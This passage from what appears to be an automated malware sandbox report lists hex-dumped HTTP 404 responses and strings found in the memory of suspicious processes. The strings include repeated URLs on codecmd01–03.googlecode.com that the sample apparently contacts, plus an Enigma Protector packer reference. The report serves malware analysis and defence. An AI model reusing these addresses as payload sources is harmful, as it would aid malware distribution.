31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: explorer.exe, 00000002.00000003.2606273000.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2344113748.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif
                      Source: explorer.exe, 00000002.00000003.2344113748.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif1k
                      Source: explorer.exe, 00000002.00000003.2411009435.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif4-avx2.exendow
                      Source: explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifL
                      Source: explorer.exe, 00000002.00000003.2788018051.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifktopshellwindow?.
                      Source: explorer.exe, 00000002.00000003.2476922152.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifmes
                      Source: explorer.exe, 00000002.00000003.2804919705.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifntimeBroker.exe2.
                      Source: explorer.exe, 00000002.00000003.2538151708.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2476922152.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.giftvjajknxrvyslhtdncvjzkdgpbnfaqprchdxexsjq
                      Source: explorer.exe, 00000002.00000003.2538151708.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd01.googlecode.com/filesxeAvzxqUTVjajkNxRvyslHTDnCvJZkDGpBNFAQPRchDXExsjQ
                      Source: explorer.exe, 00000002.00000003.2643745790.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2344113748.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif
                      Source: explorer.exe, 00000002.00000003.2674296786.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif4-avx2.exe.exe
                      Source: explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifL
                      Source: explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifS
                      Source: explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2226018783.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifV
                      Source: explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifg
                      Source: explorer.exe, 00000002.00000003.2899779963.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2606273000.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifmes
                      Source: explorer.exe, 00000002.00000003.2624369245.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifntimeBroker.exe
                      Source: explorer.exe, 00000002.00000003.2788018051.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifpplication.1ed9
                      Source: explorer.exe, 00000002.00000003.2225864160.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifpplication.1ed9f.u
                      Source: explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2226018783.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifq
                      Source: explorer.exe, 00000002.00000003.2674296786.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.giftvjajknxrvyslhtdncvjzkdgpbnfaqprchdxexsjq
                      Source: explorer.exe, 00000002.00000003.2437368779.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd02.googlecode.com/filesxeAvzxqUTVjajkNxRvyslHTDnCvJZkDGpBNFAQPRchDXExsjQ
                      Source: explorer.exe, 00000002.00000003.2578341036.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2606273000.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2249423158.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2476922152.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2787594046.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789160714.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2457246476.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2325265565.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif
                      Source: explorer.exe, 00000002.00000003.2789160714.0000000000A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif%
                      Source: explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif&
                      Source: explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif0
                      Source: explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif;
                      Source: explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifA
                      Source: explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifE
                      Source: explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifL
                      Source: explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifg
                      Source: explorer.exe, 00000002.00000003.2393742757.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2325265565.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2344113748.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifktopshellwindow
                      Source: explorer.exe, 00000002.00000003.2788018051.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifmes
                      Source: explorer.exe, 00000002.00000003.2899779963.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.0000000000A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifntimeBroker.exe
                      Source: explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifx
                      Source: file.exe, 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmp, spoolsv.exe, 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000005.00000002.2174500522.0000000000539000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000A.00000002.2310054237.0000000000539000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 0000000D.00000002.2383521769.0000000000539000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                      Source: explorer.exe, 00000002.00000003.2299766057.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2271309412.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2393742757.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2437368779.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2411009435.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2788018051.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2369527153.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 